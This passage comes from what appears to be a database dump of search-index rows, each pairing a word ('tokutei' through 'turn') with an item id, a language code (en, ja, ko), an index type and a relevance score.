('tokueti', 73, 'en', 'node_search', 1),
('tokutei', 24, 'en', 'node_search', 1.75707),
('tokutei', 24, 'ko', 'node_search', 1.74298),
('tokutei', 62, 'en', 'node_search', 1),
('tokutei', 66, 'en', 'node_search', 1),
('tokutei', 70, 'en', 'node_search', 1),
('tokutei', 71, 'en', 'node_search', 1),
('tokutei', 72, 'en', 'node_search', 1),
('tokutei', 74, 'en', 'node_search', 1),
('tokutei', 75, 'en', 'node_search', 1),
('tokutei', 81, 'en', 'node_search', 4),
('tokutei', 82, 'en', 'node_search', 1),
('tokutei', 84, 'en', 'node_search', 1),
('tokutei', 85, 'en', 'node_search', 4),
('tokutei', 90, 'en', 'node_search', 1),
('tokutei', 98, 'en', 'node_search', 1),
('tokutei', 100, 'en', 'node_search', 4),
('tokutei', 101, 'en', 'node_search', 1),
('tokutei', 102, 'en', 'node_search', 1),
('tokutei', 104, 'en', 'node_search', 1),
('tokutei', 106, 'en', 'node_search', 1),
('tokutei', 107, 'en', 'node_search', 1),
('tokutei', 107, 'ja', 'node_search', 1),
('tokutei', 109, 'en', 'node_search', 1),
('tokutei', 109, 'ja', 'node_search', 1),
('tokutei', 110, 'en', 'node_search', 1),
('tokutei', 111, 'en', 'node_search', 1),
('tokutei', 112, 'en', 'node_search', 1),
('tokutei', 112, 'ja', 'node_search', 1),
('tokutei', 114, 'en', 'node_search', 1),
('tokutei', 114, 'ja', 'node_search', 1),
('tokutei', 117, 'en', 'node_search', 1),
('tokutei', 117, 'ja', 'node_search', 1),
('tokutei', 118, 'en', 'node_search', 1),
('tokutei', 119, 'en', 'node_search', 1),
('tokutei', 119, 'ja', 'node_search', 1),
('tokutei', 123, 'en', 'node_search', 1),
('tokutei', 123, 'ja', 'node_search', 1),
('tokutei', 124, 'en', 'node_search', 1),
('tokutei', 125, 'en', 'node_search', 1),
('tokutei', 125, 'ja', 'node_search', 1),
('tokutei', 126, 'en', 'node_search', 1),
('tokutei', 127, 'en', 'node_search', 1),
('tokutei', 127, 'ja', 'node_search', 1),
('tokutei', 131, 'en', 'node_search', 1),
('tokutei', 131, 'ja', 'node_search', 1),
('tokutei', 134, 'en', 'node_search', 1),
('tokutei', 137, 'en', 'node_search', 1),
('tokutei', 137, 'ja', 'node_search', 1),
('tokutei', 138, 'en', 'node_search', 1),
('tokutei', 139, 'en', 'node_search', 1),
('tokutei', 139, 'ja', 'node_search', 1),
('tokutei', 141, 'en', 'node_search', 1),
('tokutei', 143, 'en', 'node_search', 1),
('tokutei', 143, 'ja', 'node_search', 1),
('tokutei', 144, 'en', 'node_search', 1),
('tokutei', 147, 'en', 'node_search', 7),
('tokutei', 147, 'ja', 'node_search', 7),
('tokutei', 155, 'en', 'node_search', 36),
('tokutei', 156, 'en', 'node_search', 1),
('tokutei', 157, 'en', 'node_search', 1),
('tokutei', 160, 'en', 'node_search', 28),
('tokutei', 161, 'en', 'node_search', 28),
('tokutei', 162, 'en', 'node_search', 1.92384),
('tokutei', 163, 'en', 'node_search', 28),
('tokutei', 166, 'en', 'node_search', 27),
('tokutei', 168, 'en', 'node_search', 27),
('tokutei', 170, 'en', 'node_search', 27),
('tokutei', 179, 'en', 'node_search', 1),
('tokyo', 73, 'en', 'node_search', 1),
('tokyo', 77, 'en', 'node_search', 1),
('tokyo', 111, 'en', 'node_search', 1),
('tokyo', 113, 'en', 'node_search', 1),
('tokyo', 134, 'en', 'node_search', 1),
('tokyo', 144, 'en', 'node_search', 1),
('tomatoes', 80, 'en', 'help_search', 3),
('tomatoes', 80, 'ja', 'help_search', 3),
('tomatoes', 80, 'ko', 'help_search', 3),
('took', 204, 'en', 'node_search', 4),
('took', 204, 'ja', 'node_search', 4),
('tool', 30, 'en', 'help_search', 0.722831),
('tool', 30, 'ja', 'help_search', 0.722831),
('tool', 30, 'ko', 'help_search', 0.722831),
('toolbar', 22, 'en', 'help_search', 3),
('toolbar', 22, 'ja', 'help_search', 3),
('toolbar', 22, 'ko', 'help_search', 3),
('toolbar', 23, 'en', 'help_search', 15.6581),
('toolbar', 23, 'ja', 'help_search', 15.6581),
('toolbar', 23, 'ko', 'help_search', 15.6581),
('toolbar', 39, 'en', 'help_search', 2),
('toolbar', 39, 'ja', 'help_search', 2),
('toolbar', 39, 'ko', 'help_search', 2),
('toolbar', 43, 'en', 'help_search', 15),
('toolbar', 43, 'ja', 'help_search', 15),
('toolbar', 43, 'ko', 'help_search', 15),
('toolbar', 69, 'en', 'help_search', 3),
('toolbar', 69, 'ja', 'help_search', 3),
('toolbar', 69, 'ko', 'help_search', 3),
('toolbar', 81, 'en', 'help_search', 3),
('toolbar', 81, 'ja', 'help_search', 3),
('toolbar', 81, 'ko', 'help_search', 3),
('tooltip', 23, 'en', 'help_search', 0.906287),
('tooltip', 23, 'ja', 'help_search', 0.906287),
('tooltip', 23, 'ko', 'help_search', 0.906287),
('top', 24, 'en', 'node_search', 1),
('top', 24, 'ko', 'node_search', 1),
('top', 42, 'en', 'help_search', 1),
('top', 42, 'ja', 'help_search', 1),
('top', 42, 'ko', 'help_search', 1),
('top', 43, 'en', 'help_search', 1),
('top', 43, 'ja', 'help_search', 1),
('top', 43, 'ko', 'help_search', 1),
('top', 45, 'en', 'help_search', 1),
('top', 45, 'ja', 'help_search', 1),
('top', 45, 'ko', 'help_search', 1),
('top', 93, 'en', 'help_search', 0.968904),
('top', 93, 'ja', 'help_search', 0.968904),
('top', 93, 'ko', 'help_search', 0.968904),
('topic', 7, 'en', 'help_search', 1),
('topic', 7, 'ja', 'help_search', 1),
('topic', 7, 'ko', 'help_search', 1),
('topic', 23, 'en', 'help_search', 0.976851),
('topic', 23, 'ja', 'help_search', 0.976851),
('topic', 23, 'ko', 'help_search', 0.976851),
('topic', 28, 'en', 'help_search', 0.851346),
('topic', 28, 'ja', 'help_search', 0.851346),
('topic', 28, 'ko', 'help_search', 0.851346),
('topic', 45, 'en', 'help_search', 2),
('topic', 45, 'ja', 'help_search', 2),
('topic', 45, 'ko', 'help_search', 2),
('topic', 46, 'en', 'help_search', 22.9534),
('topic', 46, 'ja', 'help_search', 22.9534),
('topic', 46, 'ko', 'help_search', 22.9534),
('topic', 54, 'en', 'help_search', 2),
('topic', 54, 'ja', 'help_search', 2),
('topic', 54, 'ko', 'help_search', 2),
('topic', 59, 'en', 'help_search', 1),
('topic', 59, 'ja', 'help_search', 1),
('topic', 59, 'ko', 'help_search', 1),
('topic', 63, 'en', 'help_search', 1),
('topic', 63, 'ja', 'help_search', 1),
('topic', 63, 'ko', 'help_search', 1),
('topic', 79, 'en', 'help_search', 1),
('topic', 79, 'ja', 'help_search', 1),
('topic', 79, 'ko', 'help_search', 1),
('topic', 89, 'en', 'help_search', 1),
('topic', 89, 'ja', 'help_search', 1),
('topic', 89, 'ko', 'help_search', 1),
('topic', 93, 'en', 'help_search', 0.808176),
('topic', 93, 'ja', 'help_search', 0.808176),
('topic', 93, 'ko', 'help_search', 0.808176),
('topics', 2, 'en', 'help_search', 1),
('topics', 2, 'ja', 'help_search', 1),
('topics', 2, 'ko', 'help_search', 1),
('topics', 8, 'en', 'help_search', 1),
('topics', 8, 'ja', 'help_search', 1),
('topics', 8, 'ko', 'help_search', 1),
('topics', 11, 'en', 'help_search', 0.863659),
('topics', 11, 'ja', 'help_search', 0.863659),
('topics', 11, 'ko', 'help_search', 0.863659),
('topics', 20, 'en', 'help_search', 1),
('topics', 20, 'ja', 'help_search', 1),
('topics', 20, 'ko', 'help_search', 1),
('topics', 29, 'en', 'help_search', 0.957226),
('topics', 29, 'ja', 'help_search', 0.957226),
('topics', 29, 'ko', 'help_search', 0.957226),
('topics', 30, 'en', 'help_search', 0.689612),
('topics', 30, 'ja', 'help_search', 0.689612),
('topics', 30, 'ko', 'help_search', 0.689612),
('topics', 33, 'en', 'help_search', 1),
('topics', 33, 'ja', 'help_search', 1),
('topics', 33, 'ko', 'help_search', 1),
('topics', 34, 'en', 'help_search', 1),
('topics', 34, 'ja', 'help_search', 1),
('topics', 34, 'ko', 'help_search', 1),
('topics', 35, 'en', 'help_search', 0.976851),
('topics', 35, 'ja', 'help_search', 0.976851),
('topics', 35, 'ko', 'help_search', 0.976851),
('topics', 36, 'en', 'help_search', 1),
('topics', 36, 'ja', 'help_search', 1),
('topics', 36, 'ko', 'help_search', 1),
('topics', 38, 'en', 'help_search', 1),
('topics', 38, 'ja', 'help_search', 1),
('topics', 38, 'ko', 'help_search', 1),
('topics', 40, 'en', 'help_search', 1),
('topics', 40, 'ja', 'help_search', 1),
('topics', 40, 'ko', 'help_search', 1),
('topics', 41, 'en', 'help_search', 1),
('topics', 41, 'ja', 'help_search', 1),
('topics', 41, 'ko', 'help_search', 1),
('topics', 43, 'en', 'help_search', 1.86679),
('topics', 43, 'ja', 'help_search', 1.86679),
('topics', 43, 'ko', 'help_search', 1.86679),
('topics', 46, 'en', 'help_search', 121.282),
('topics', 46, 'ja', 'help_search', 121.282),
('topics', 46, 'ko', 'help_search', 121.282),
('topics', 48, 'en', 'help_search', 1),
('topics', 48, 'ja', 'help_search', 1),
('topics', 48, 'ko', 'help_search', 1),
('topics', 57, 'en', 'help_search', 1),
('topics', 57, 'ja', 'help_search', 1),
('topics', 57, 'ko', 'help_search', 1),
('topics', 60, 'en', 'help_search', 1),
('topics', 60, 'ja', 'help_search', 1),
('topics', 60, 'ko', 'help_search', 1),
('topics', 62, 'en', 'help_search', 1),
('topics', 62, 'ja', 'help_search', 1),
('topics', 62, 'ko', 'help_search', 1),
('topics', 63, 'en', 'help_search', 1),
('topics', 63, 'ja', 'help_search', 1),
('topics', 63, 'ko', 'help_search', 1),
('topics', 65, 'en', 'help_search', 1),
('topics', 65, 'ja', 'help_search', 1),
('topics', 65, 'ko', 'help_search', 1),
('topics', 68, 'en', 'help_search', 1.79475),
('topics', 68, 'ja', 'help_search', 1.79475),
('topics', 68, 'ko', 'help_search', 1.79475),
('topics', 79, 'en', 'help_search', 1),
('topics', 79, 'ja', 'help_search', 1),
('topics', 79, 'ko', 'help_search', 1),
('topics', 80, 'en', 'help_search', 0.909743),
('topics', 80, 'ja', 'help_search', 0.909743),
('topics', 80, 'ko', 'help_search', 0.909743),
('topics', 84, 'en', 'help_search', 1),
('topics', 84, 'ja', 'help_search', 1),
('topics', 84, 'ko', 'help_search', 1),
('topics', 90, 'en', 'help_search', 1),
('topics', 90, 'ja', 'help_search', 1),
('topics', 90, 'ko', 'help_search', 1),
('topics', 93, 'en', 'help_search', 0.792123),
('topics', 93, 'ja', 'help_search', 0.792123),
('topics', 93, 'ko', 'help_search', 0.792123),
('topics', 133, 'en', 'node_search', 1),
('topik', 4, 'en', 'node_search', 1),
('topik', 4, 'ja', 'node_search', 1),
('topj', 23, 'en', 'node_search', 0.797402),
('topj', 23, 'ja', 'node_search', 0.460161),
('topj', 23, 'ko', 'node_search', 0.727213),
('topj', 24, 'ja', 'node_search', 0.714225),
('topleft', 39, 'en', 'help_search', 1),
('topleft', 39, 'ja', 'help_search', 1),
('topleft', 39, 'ko', 'help_search', 1),
('toplevel', 46, 'en', 'help_search', 1),
('toplevel', 46, 'ja', 'help_search', 1),
('toplevel', 46, 'ko', 'help_search', 1),
('topright', 39, 'en', 'help_search', 1),
('topright', 39, 'ja', 'help_search', 1),
('topright', 39, 'ko', 'help_search', 1),
('total', 27, 'en', 'node_search', 0.71),
('totally', 72, 'en', 'help_search', 1),
('totally', 72, 'ja', 'help_search', 1),
('totally', 72, 'ko', 'help_search', 1),
('tour', 81, 'en', 'help_search', 23),
('tour', 81, 'ja', 'help_search', 23),
('tour', 81, 'ko', 'help_search', 23),
('tourism', 23, 'en', 'node_search', 1),
('tours', 81, 'en', 'help_search', 51),
('tours', 81, 'ja', 'help_search', 51),
('tours', 81, 'ko', 'help_search', 51),
('toward', 160, 'en', 'node_search', 4),
('toward', 165, 'en', 'node_search', 1),
('toward', 169, 'en', 'node_search', 1),
('toward', 170, 'en', 'node_search', 1),
('toward', 171, 'en', 'node_search', 2),
('toward', 173, 'en', 'node_search', 1),
('toward', 174, 'en', 'node_search', 1),
('toward', 175, 'en', 'node_search', 1),
('toward', 176, 'en', 'node_search', 1),
('toward', 177, 'en', 'node_search', 1),
('toward', 178, 'en', 'node_search', 28),
('toward', 180, 'en', 'node_search', 1),
('toward', 182, 'en', 'node_search', 1),
('toward', 185, 'en', 'node_search', 1),
('toward', 187, 'en', 'node_search', 2),
('toward', 188, 'en', 'node_search', 1),
('toward', 189, 'en', 'node_search', 1),
('toward', 190, 'en', 'node_search', 1),
('toward', 191, 'en', 'node_search', 2),
('toward', 193, 'en', 'node_search', 1),
('toward', 196, 'en', 'node_search', 2),
('toward', 197, 'en', 'node_search', 1),
('toward', 198, 'en', 'node_search', 27),
('toward', 199, 'en', 'node_search', 1),
('towards', 1, 'en', 'node_search', 1),
('towns', 27, 'en', 'node_search', 0.714225),
('township', 11, 'ko', 'node_search', 1),
('township', 31, 'en', 'node_search', 0.827757),
('track', 38, 'en', 'help_search', 1),
('track', 38, 'ja', 'help_search', 1),
('track', 38, 'ko', 'help_search', 1),
('tracked', 47, 'en', 'help_search', 19),
('tracked', 47, 'ja', 'help_search', 19),
('tracked', 47, 'ko', 'help_search', 19),
('tracking', 40, 'en', 'help_search', 46),
('tracking', 40, 'ja', 'help_search', 46),
('tracking', 40, 'ko', 'help_search', 46),
('tracking', 47, 'en', 'help_search', 45),
('tracking', 47, 'ja', 'help_search', 45),
('tracking', 47, 'ko', 'help_search', 45),
('tracks', 40, 'en', 'help_search', 1),
('tracks', 40, 'ja', 'help_search', 1),
('tracks', 40, 'ko', 'help_search', 1),
('tracks', 47, 'en', 'help_search', 1),
('tracks', 47, 'ja', 'help_search', 1),
('tracks', 47, 'ko', 'help_search', 1),
('trade', 27, 'en', 'node_search', 0.689612),
('trading', 1, 'en', 'node_search', 17),
('trading', 1, 'ja', 'node_search', 26),
('trading', 1, 'ko', 'node_search', 17),
('trading', 4, 'en', 'node_search', 1),
('trading', 4, 'ja', 'node_search', 1),
('trading', 4, 'ko', 'node_search', 1),
('trading', 5, 'en', 'node_search', 1),
('trading', 5, 'ja', 'node_search', 0.727213),
('trading', 5, 'ko', 'node_search', 1),
('trading', 9, 'en', 'node_search', 28),
('trading', 9, 'ko', 'node_search', 28),
('trading', 10, 'en', 'node_search', 1),
('trading', 10, 'ja', 'node_search', 1),
('trading', 10, 'ko', 'node_search', 1),
('trading', 11, 'en', 'node_search', 16),
('trading', 17, 'en', 'node_search', 30),
('trading', 17, 'ko', 'node_search', 30),
('trading', 18, 'en', 'node_search', 1),
('trading', 18, 'ja', 'node_search', 0.886095),
('trading', 18, 'ko', 'node_search', 1),
('trading', 19, 'en', 'node_search', 1),
('trading', 19, 'ko', 'node_search', 1),
('trading', 23, 'en', 'node_search', 6.65304),
('trading', 23, 'ko', 'node_search', 1.78178),
('trading', 24, 'ko', 'node_search', 1),
('trading', 27, 'en', 'node_search', 1),
('trading', 28, 'en', 'node_search', 3),
('trading', 28, 'ja', 'node_search', 28),
('trading', 28, 'ko', 'node_search', 28),
('trading', 29, 'en', 'node_search', 28),
('trading', 29, 'ja', 'node_search', 28),
('trading', 29, 'ko', 'node_search', 28),
('trading', 30, 'en', 'node_search', 1),
('trading', 30, 'ja', 'node_search', 0.836446),
('trading', 30, 'ko', 'node_search', 1),
('trading', 62, 'en', 'node_search', 1),
('trading', 62, 'ja', 'node_search', 0.78951),
('trading', 154, 'en', 'node_search', 2),
('trading', 160, 'en', 'node_search', 2),
('trading', 161, 'en', 'node_search', 2),
('trading', 162, 'en', 'node_search', 1.86366),
('trading', 164, 'en', 'node_search', 2),
('trading', 165, 'en', 'node_search', 2),
('trading', 166, 'en', 'node_search', 1),
('trading', 167, 'en', 'node_search', 2),
('trading', 168, 'en', 'node_search', 1),
('trading', 169, 'en', 'node_search', 1),
('trading', 170, 'en', 'node_search', 1),
('trading', 171, 'en', 'node_search', 1),
('trading', 173, 'en', 'node_search', 2),
('trading', 174, 'en', 'node_search', 2),
('trading', 175, 'en', 'node_search', 2),
('trading', 176, 'en', 'node_search', 1),
('trading', 177, 'en', 'node_search', 1),
('trading', 178, 'en', 'node_search', 1),
('trading', 179, 'en', 'node_search', 2),
('trading', 180, 'en', 'node_search', 1),
('trading', 184, 'en', 'node_search', 1),
('trading', 185, 'en', 'node_search', 1),
('trading', 186, 'en', 'node_search', 1),
('trading', 187, 'en', 'node_search', 1),
('trading', 188, 'en', 'node_search', 1),
('trading', 189, 'en', 'node_search', 1),
('trading', 190, 'en', 'node_search', 1),
('trading', 191, 'en', 'node_search', 1),
('trading', 192, 'en', 'node_search', 1),
('trading', 193, 'en', 'node_search', 1),
('trading', 194, 'en', 'node_search', 1),
('trading', 195, 'en', 'node_search', 1),
('trading', 196, 'en', 'node_search', 1),
('trading', 197, 'en', 'node_search', 1),
('trading', 198, 'en', 'node_search', 1),
('trading', 199, 'en', 'node_search', 1),
('tradition', 3, 'en', 'node_search', 1),
('tradition', 3, 'ko', 'node_search', 1),
('traditional', 24, 'en', 'node_search', 1),
('traditional', 48, 'en', 'help_search', 1),
('traditional', 48, 'ja', 'help_search', 1),
('traditional', 48, 'ko', 'help_search', 1),
('traditions', 122, 'en', 'node_search', 1),
('train', 25, 'en', 'node_search', 1),
('trainees', 6, 'en', 'node_search', 3),
('trainees', 9, 'en', 'node_search', 28),
('trainees', 17, 'en', 'node_search', 29),
('training', 9, 'en', 'node_search', 3),
('training', 17, 'en', 'node_search', 4),
('training', 23, 'en', 'node_search', 2.56287),
('training', 24, 'en', 'node_search', 6.09784),
('training', 24, 'ja', 'node_search', 0.582831),
('training', 24, 'ko', 'node_search', 1.74069),
('training', 26, 'en', 'node_search', 1),
('training', 31, 'en', 'node_search', 1.89608),
('training', 62, 'en', 'node_search', 1),
('training', 95, 'en', 'node_search', 28),
('training', 95, 'ja', 'node_search', 27),
('training', 98, 'en', 'node_search', 1),
('training', 121, 'en', 'node_search', 1),
('training', 133, 'en', 'node_search', 1),
('training', 135, 'en', 'node_search', 46),
('training', 135, 'ja', 'node_search', 27),
('training', 136, 'en', 'node_search', 2),
('training', 140, 'en', 'node_search', 1),
('training', 150, 'en', 'node_search', 46),
('training', 150, 'ja', 'node_search', 27),
('training', 161, 'en', 'node_search', 1),
('training', 165, 'en', 'node_search', 1),
('training', 169, 'en', 'node_search', 1),
('training', 173, 'en', 'node_search', 1),
('training', 174, 'en', 'node_search', 1),
('training', 176, 'en', 'node_search', 1),
('training', 179, 'en', 'node_search', 1),
('traits', 23, 'en', 'node_search', 0.819249),
('transferred', 7, 'en', 'node_search', 2),
('transferred', 7, 'ko', 'node_search', 2),
('transferred', 44, 'en', 'help_search', 1),
('transferred', 44, 'ja', 'help_search', 1),
('transferred', 44, 'ko', 'help_search', 1),
('transform', 28, 'en', 'help_search', 1),
('transform', 28, 'ja', 'help_search', 1),
('transform', 28, 'ko', 'help_search', 1),
('transition', 142, 'en', 'node_search', 1),
('translatable', 16, 'en', 'help_search', 1),
('translatable', 16, 'ja', 'help_search', 1),
('translatable', 16, 'ko', 'help_search', 1),
('translatable', 46, 'en', 'help_search', 3),
('translatable', 46, 'ja', 'help_search', 3),
('translatable', 46, 'ko', 'help_search', 3),
('translatable', 92, 'en', 'help_search', 9),
('translatable', 92, 'ja', 'help_search', 9),
('translatable', 92, 'ko', 'help_search', 9),
('translate', 16, 'en', 'help_search', 11),
('translate', 16, 'ja', 'help_search', 11),
('translate', 16, 'ko', 'help_search', 11),
('translate', 41, 'en', 'help_search', 1),
('translate', 41, 'ja', 'help_search', 1),
('translate', 41, 'ko', 'help_search', 1),
('translate', 52, 'en', 'help_search', 2),
('translate', 52, 'ja', 'help_search', 2),
('translate', 52, 'ko', 'help_search', 2),
('translate', 92, 'en', 'help_search', 6),
('translate', 92, 'ja', 'help_search', 6),
('translate', 92, 'ko', 'help_search', 6),
('translated', 41, 'en', 'help_search', 23),
('translated', 41, 'ja', 'help_search', 23),
('translated', 41, 'ko', 'help_search', 23),
('translated', 46, 'en', 'help_search', 19),
('translated', 46, 'ja', 'help_search', 19),
('translated', 46, 'ko', 'help_search', 19),
('translated', 52, 'en', 'help_search', 1),
('translated', 52, 'ja', 'help_search', 1),
('translated', 52, 'ko', 'help_search', 1),
('translated', 53, 'en', 'help_search', 1),
('translated', 53, 'ja', 'help_search', 1),
('translated', 53, 'ko', 'help_search', 1),
('translating', 16, 'en', 'help_search', 26),
('translating', 16, 'ja', 'help_search', 26),
('translating', 16, 'ko', 'help_search', 26),
('translating', 52, 'en', 'help_search', 26),
('translating', 52, 'ja', 'help_search', 26),
('translating', 52, 'ko', 'help_search', 26),
('translation', 16, 'en', 'help_search', 4),
('translation', 16, 'ja', 'help_search', 4),
('translation', 16, 'ko', 'help_search', 4),
('translation', 24, 'en', 'node_search', 1),
('translation', 41, 'en', 'help_search', 3),
('translation', 41, 'ja', 'help_search', 3),
('translation', 41, 'ko', 'help_search', 3),
('translation', 45, 'en', 'help_search', 1),
('translation', 45, 'ja', 'help_search', 1),
('translation', 45, 'ko', 'help_search', 1),
('translation', 46, 'en', 'help_search', 3),
('translation', 46, 'ja', 'help_search', 3),
('translation', 46, 'ko', 'help_search', 3),
('translation', 49, 'en', 'help_search', 1),
('translation', 49, 'ja', 'help_search', 1),
('translation', 49, 'ko', 'help_search', 1),
('translation', 51, 'en', 'help_search', 34),
('translation', 51, 'ja', 'help_search', 34),
('translation', 51, 'ko', 'help_search', 34),
('translation', 52, 'en', 'help_search', 5),
('translation', 52, 'ja', 'help_search', 5),
('translation', 52, 'ko', 'help_search', 5),
('translation', 53, 'en', 'help_search', 35),
('translation', 53, 'ja', 'help_search', 35),
('translation', 53, 'ko', 'help_search', 35),
('translation', 92, 'en', 'help_search', 31),
('translation', 92, 'ja', 'help_search', 31),
('translation', 92, 'ko', 'help_search', 31),
('translation', 204, 'en', 'node_search', 4),
('translation', 204, 'ja', 'node_search', 4),
('translations', 16, 'en', 'help_search', 1),
('translations', 16, 'ja', 'help_search', 1),
('translations', 16, 'ko', 'help_search', 1),
('translations', 41, 'en', 'help_search', 29),
('translations', 41, 'ja', 'help_search', 29),
('translations', 41, 'ko', 'help_search', 29),
('translations', 49, 'en', 'help_search', 2),
('translations', 49, 'ja', 'help_search', 2),
('translations', 49, 'ko', 'help_search', 2),
('translations', 51, 'en', 'help_search', 1),
('translations', 51, 'ja', 'help_search', 1),
('translations', 51, 'ko', 'help_search', 1),
('translations', 52, 'en', 'help_search', 5),
('translations', 52, 'ja', 'help_search', 5),
('translations', 52, 'ko', 'help_search', 5),
('translations', 53, 'en', 'help_search', 1),
('translations', 53, 'ja', 'help_search', 1),
('translations', 53, 'ko', 'help_search', 1),
('translations', 77, 'en', 'help_search', 1),
('translations', 77, 'ja', 'help_search', 1),
('translations', 77, 'ko', 'help_search', 1),
('transmission', 37, 'en', 'help_search', 1),
('transmission', 37, 'ja', 'help_search', 1),
('transmission', 37, 'ko', 'help_search', 1),
('transport', 9, 'en', 'node_search', 3),
('transport', 17, 'en', 'node_search', 4),
('transport', 24, 'en', 'node_search', 1),
('transport', 27, 'en', 'node_search', 1),
('transportation', 5, 'en', 'node_search', 1),
('transportation', 5, 'ko', 'node_search', 1),
('transportation', 18, 'en', 'node_search', 1),
('transportation', 18, 'ko', 'node_search', 1),
('transportation', 23, 'en', 'node_search', 1),
('transported', 44, 'en', 'help_search', 1),
('transported', 44, 'ja', 'help_search', 1),
('transported', 44, 'ko', 'help_search', 1),
('travel', 24, 'en', 'node_search', 1),
('traveling', 24, 'en', 'node_search', 1),
('tray', 39, 'en', 'help_search', 2),
('tray', 39, 'ja', 'help_search', 2),
('tray', 39, 'ko', 'help_search', 2),
('tray', 43, 'en', 'help_search', 1),
('tray', 43, 'ja', 'help_search', 1),
('tray', 43, 'ko', 'help_search', 1),
('treat', 77, 'en', 'node_search', 4),
('treat', 87, 'en', 'node_search', 1),
('treatment', 120, 'en', 'node_search', 49),
('treatment', 120, 'ja', 'node_search', 27),
('triggers', 46, 'en', 'help_search', 1),
('triggers', 46, 'ja', 'help_search', 1),
('triggers', 46, 'ko', 'help_search', 1),
('troubleshooting', 34, 'en', 'help_search', 46),
('troubleshooting', 34, 'ja', 'help_search', 46),
('troubleshooting', 34, 'ko', 'help_search', 46),
('truck', 27, 'en', 'node_search', 1.3172),
('trucks', 23, 'en', 'node_search', 1),
('true', 31, 'ja', 'help_search', 0.892724),
('truly', 120, 'en', 'node_search', 1),
('trust', 25, 'en', 'node_search', 1),
('trust', 69, 'en', 'node_search', 1),
('trust', 135, 'en', 'node_search', 1),
('trusted', 69, 'en', 'node_search', 1),
('trusted', 85, 'en', 'help_search', 4),
('trusted', 85, 'ja', 'help_search', 4),
('trusted', 85, 'ko', 'help_search', 4),
('trustful', 27, 'en', 'node_search', 0.857458),
('try', 45, 'en', 'help_search', 1),
('try', 45, 'ja', 'help_search', 1),
('try', 45, 'ko', 'help_search', 1),
('try', 87, 'en', 'node_search', 1),
('trying', 26, 'en', 'node_search', 1),
('trying', 34, 'en', 'help_search', 1),
('trying', 34, 'ja', 'help_search', 1),
('trying', 34, 'ko', 'help_search', 1),
('trying', 74, 'en', 'help_search', 1),
('trying', 74, 'ja', 'help_search', 1),
('trying', 74, 'ko', 'help_search', 1),
('tsp', 11, 'en', 'node_search', 1),
('tsp', 11, 'ja', 'node_search', 1),
('tsukuba', 163, 'en', 'node_search', 2),
('tue', 1, 'en', 'node_search', 1),
('tue', 3, 'en', 'node_search', 2),
('tue', 3, 'ja', 'node_search', 1),
('tue', 3, 'ko', 'node_search', 1),
('tue', 4, 'en', 'node_search', 1),
('tue', 5, 'en', 'node_search', 1),
('tue', 6, 'en', 'node_search', 1),
('tue', 7, 'en', 'node_search', 1),
('tue', 8, 'en', 'node_search', 1),
('tue', 9, 'en', 'node_search', 1),
('tue', 10, 'en', 'node_search', 1),
('tue', 24, 'ko', 'node_search', 1),
('tue', 66, 'en', 'node_search', 2),
('tue', 67, 'ja', 'node_search', 2),
('tue', 68, 'en', 'node_search', 1),
('tue', 68, 'ja', 'node_search', 1),
('tue', 69, 'en', 'node_search', 2),
('tue', 69, 'ja', 'node_search', 2),
('tue', 70, 'en', 'node_search', 1),
('tue', 70, 'ja', 'node_search', 1),
('tue', 71, 'en', 'node_search', 1),
('tue', 71, 'ja', 'node_search', 1),
('tue', 72, 'en', 'node_search', 1),
('tue', 72, 'ja', 'node_search', 1),
('tue', 73, 'en', 'node_search', 1),
('tue', 73, 'ja', 'node_search', 1),
('tue', 74, 'en', 'node_search', 1),
('tue', 74, 'ja', 'node_search', 1),
('tue', 75, 'en', 'node_search', 1),
('tue', 75, 'ja', 'node_search', 1),
('tue', 76, 'en', 'node_search', 1),
('tue', 76, 'ja', 'node_search', 1),
('tue', 77, 'en', 'node_search', 2),
('tue', 77, 'ja', 'node_search', 2),
('tue', 78, 'en', 'node_search', 1),
('tue', 78, 'ja', 'node_search', 1),
('tue', 79, 'en', 'node_search', 1),
('tue', 80, 'en', 'node_search', 1),
('tue', 80, 'ja', 'node_search', 1),
('tue', 81, 'en', 'node_search', 2),
('tue', 81, 'ja', 'node_search', 2),
('tue', 82, 'en', 'node_search', 1),
('tue', 82, 'ja', 'node_search', 1),
('tue', 83, 'en', 'node_search', 1),
('tue', 83, 'ja', 'node_search', 1),
('tue', 84, 'en', 'node_search', 1),
('tue', 84, 'ja', 'node_search', 1),
('tue', 85, 'en', 'node_search', 2),
('tue', 85, 'ja', 'node_search', 2),
('tue', 86, 'en', 'node_search', 1),
('tue', 86, 'ja', 'node_search', 1),
('tue', 87, 'en', 'node_search', 1),
('tue', 87, 'ja', 'node_search', 1),
('tue', 88, 'en', 'node_search', 1),
('tue', 88, 'ja', 'node_search', 1),
('tue', 89, 'en', 'node_search', 1),
('tue', 89, 'ja', 'node_search', 1),
('tue', 90, 'en', 'node_search', 1),
('tue', 90, 'ja', 'node_search', 1),
('tue', 91, 'en', 'node_search', 1),
('tue', 91, 'ja', 'node_search', 1),
('tue', 92, 'en', 'node_search', 1),
('tue', 92, 'ja', 'node_search', 1),
('tue', 93, 'en', 'node_search', 1),
('tue', 93, 'ja', 'node_search', 1),
('tue', 94, 'en', 'node_search', 1),
('tue', 95, 'en', 'node_search', 1),
('tue', 95, 'ja', 'node_search', 1),
('tue', 96, 'en', 'node_search', 1),
('tue', 96, 'ja', 'node_search', 1),
('tue', 97, 'en', 'node_search', 1),
('tue', 97, 'ja', 'node_search', 1),
('tue', 98, 'en', 'node_search', 1),
('tue', 98, 'ja', 'node_search', 1),
('tue', 99, 'en', 'node_search', 1),
('tue', 99, 'ja', 'node_search', 1),
('tue', 148, 'en', 'node_search', 2),
('tue', 148, 'ja', 'node_search', 2),
('tue', 149, 'en', 'node_search', 1),
('tue', 156, 'en', 'node_search', 1),
('tue', 156, 'ja', 'node_search', 1),
('tue', 161, 'en', 'node_search', 1),
('tue', 161, 'ja', 'node_search', 1),
('tue', 163, 'en', 'node_search', 1),
('tue', 163, 'ja', 'node_search', 1),
('tue', 179, 'en', 'node_search', 1),
('tue', 179, 'ja', 'node_search', 1),
('tue', 180, 'en', 'node_search', 1),
('tue', 180, 'ja', 'node_search', 1),
('tue', 205, 'en', 'node_search', 1),
('tue', 205, 'ja', 'node_search', 1),
('tuesday', 62, 'en', 'node_search', 1.855),
('tun', 62, 'en', 'node_search', 1),
('tun', 62, 'ja', 'node_search', 1),
('tun', 177, 'en', 'node_search', 2),
('tun', 177, 'ja', 'node_search', 1.71423),
('tun', 197, 'en', 'node_search', 6),
('tun', 197, 'ja', 'node_search', 4.07688),
('tuned', 66, 'en', 'node_search', 1),
('turn', 9, 'en', 'help_search', 3),
